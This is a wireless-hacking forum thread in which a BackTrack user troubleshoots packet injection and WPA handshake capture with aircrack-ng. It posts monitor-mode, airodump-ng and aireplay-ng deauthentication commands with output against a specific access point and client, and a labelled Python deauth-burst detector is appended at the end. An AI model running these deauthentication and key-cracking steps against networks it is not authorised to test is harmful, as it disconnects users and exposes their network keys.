Why not upgrade to BT4? Have you tried to inject on BT4? An easy way to see is to boot up and log in, open a terminal, type airmon-ng start eth1 and then aireplay-ng --test your monitor interface (--test basically tests injection).
I am using BT3 with linux kernel 2.6.21.5
Should I upgrade the kernel or not?
There are only zd1211rw_inject_2.6.26.patch and zd1211rw_inject_2.6.23.patch
What should I do next?
The interface changes to mon0 when it enters monitor mode.
Code:
    aireplay-ng --test mon0
    For information, no action required: Using gettimeofday() instead of /dev/rtc
    03:24:02 Trying broadcast probe requests...
    03:24:04 No Answer...
    03:24:04 Found 0 APs
I am running both BT3 and BT4 beta using VMware. Is there any impact on this?
Code:
    airmon-ng start wlan0 (Not eth1 anymore in BT4...)
    Found 1 processes that could cause trouble.
    If airodumo-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID Name
    5330 Knetworkmanager
    Interface Chipset Driver
    wlan0 ZyDAS 1211 zd1211rw - [phy0]
    (monitor mode enabled on mon0)
I even tested the injection in both BT3 and BT4 beta... Neither of them works... T.T
Is there something wrong with my wireless USB adaptor...?
To be successful here you should read all of the following.
ForumRules
ForumFAQ
If you are new to Back|Track
Back|Track Wiki
Failure to do so will probably get your threads deleted or worse.
I have read the following post, which indicates the Hawking HWU8DD rev. B can inject... But I still have problems injecting... even the injection test fails...
hxxp://forums.remote-exploit.org/showthread.php?t=18309&highlight=injection+HWU8DD
Do I need to make a fake authentication to the AP first before I de-authenticate the client, or vice versa?
and
Do I need to associate with the AP before I do any injection?
The problem is obviously with your comprehension.
Since the title of this thread is in regards to WPA, here are the basic steps:
Start the wireless interface in monitor mode on the specific AP channel
Start airodump-ng on AP channel with filter for bssid to collect authentication handshake.
Use aireplay-ng to deauthenticate the wireless client
Run aircrack-ng to crack the pre-shared key using the authentication handshake
Since you are having trouble with the capture itself why not have a look at
this tutorial and follow it through.
I have actually read through the tutorial from aircrack-ng website:
"Tutorial: How to Crack WPA/WPA2" hxxp://www.aircrack-ng.org/doku.php?id=cracking_wpa
And I followed it step by step...
Just when I was doing "Step 3 - Use aireplay-ng to deauthenticate the wireless client", I cannot capture any handshakes, no matter how many times I try to send deauth messages to the AP and client...
I can't capture any handshake...>.< Why?
Code:
    bt ~ # airmon-ng stop eth1
    Interface Chipset Driver
    eth1 ZyDAS 1211 zd1211rw (monitor mode disabled)
    bt ~ # airmon-ng start eth1 4
    Found 1 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    PID Name
    3520 dhcpcd
    Interface Chipset Driver
    eth1 ZyDAS 1211 zd1211rw (monitor mode enabled)
    bt ~ # iwconfig
    lo no wireless extensions.
    eth0 no wireless extensions.
    eth1 IEEE 802.11b/g ESSID:off/any Nickname:"zd1211"
         Mode:Monitor Frequency:2.472 GHz Access Point: Invalid
         Bit Rate=1 Mb/s
         Encryption key:off
         Link Quality:0 Signal level:0 Noise level:0
         Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
         Tx excessive retries:0 Invalid misc:0 Missed beacon:0
    bt ~ # airodump-ng -c 4 --bssid 00:11:6B:18:EB:F6 -w wpa20090315 eth1
    (Then it starts capturing packet.....)
    bt ~ # aireplay-ng -0 10 -a 00:11:6B:18:EB:F6 -c 00:16:EA:C8:27:30 eth1
    06:08:58 Waiting for beacon frame (BSSID: 00:11:6B:18:EB:F6) on channel 13
    06:08:58 eth1 is on channel 13, but the AP uses channel 4
    bt ~ # aireplay-ng -0 10 -a 00:11:6B:18:EB:F6 -c 00:16:EA:C8:27:30 eth1
    06:09:02 Waiting for beacon frame (BSSID: 00:11:6B:18:EB:F6) on channel 4
    06:09:03 Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 0 ACKs]
    06:09:04 Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 0| 0 ACKs]
    06:09:05 Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 0| 0 ACKs]
    06:09:06 Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 6| 2 ACKs]
    06:09:07 Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 0| 0 ACKs]
    06:09:08 Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 0 ACKs]
    06:09:09 Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 0 ACKs]
    06:09:11 Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 0 ACKs]
    06:09:11 Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 0| 0 ACKs]
    06:09:12 Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 0 ACKs]
    bt ~ #
Give the full output of:
airodump-ng -c 4 --bssid 00:11:6B:18:EB:F6 -w wpa20090315 eth1
(Then it starts capturing packet.....)
I can clearly see that your deauth is not working.
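Seen from the monitoring side, the deauthentication step discussed in this thread appears as a burst of deauth frames between one AP/client pair. The following is an added example, not code from any poster in the thread: a small burst detector over constructed frame records. The record layout, the one-second window and the threshold of 10 are assumptions; the MAC addresses are the ones quoted in the posted output.

```python
from collections import defaultdict, deque

# MAC addresses as quoted in the thread; everything else below is constructed.
AP, STA = "00:11:6B:18:EB:F6", "00:16:EA:C8:27:30"
BROADCAST = "ff:ff:ff:ff:ff:ff"

def build_sample():
    """Constructed capture: (seconds, mgmt subtype, source MAC, destination MAC)."""
    frames = [(i * 0.1024, "beacon", AP, BROADCAST) for i in range(30)]
    # A single deauth, e.g. a client leaving normally: must not alert.
    frames.append((0.5, "deauth", STA, AP))
    # 64 deauths inside one second, matching "Sending 64 directed DeAuth".
    frames += [(2.0 + i * 0.01, "deauth", AP, STA) for i in range(64)]
    return sorted(frames)

def detect_deauth_bursts(frames, window=1.0, threshold=10):
    """Return [(burst_start, src, dst, peak_count)] for every src/dst pair
    that sends at least `threshold` deauth/disassoc frames within `window` s."""
    recent = defaultdict(deque)   # (src, dst) -> timestamps still in the window
    alerts = {}                   # (src, dst) -> (burst_start, peak_count)
    for ts, subtype, src, dst in frames:
        if subtype not in ("deauth", "disassoc"):
            continue
        q = recent[(src, dst)]
        q.append(ts)
        while ts - q[0] > window:          # expire frames older than the window
            q.popleft()
        if len(q) >= threshold:
            start, peak = alerts.get((src, dst), (q[0], 0))
            alerts[(src, dst)] = (start, max(peak, len(q)))
    return [(start, s, d, peak) for (s, d), (start, peak) in alerts.items()]

if __name__ == "__main__":
    for start, src, dst, peak in detect_deauth_bursts(build_sample()):
        print(f"deauth burst from t={start:.2f}s: {src} -> {dst}, peak {peak}/s")
```

Deauthentication frames are unauthenticated unless 802.11w (Protected Management Frames) is in use, so the source address in an alert may be spoofed and identifies the targeted pair rather than the sender.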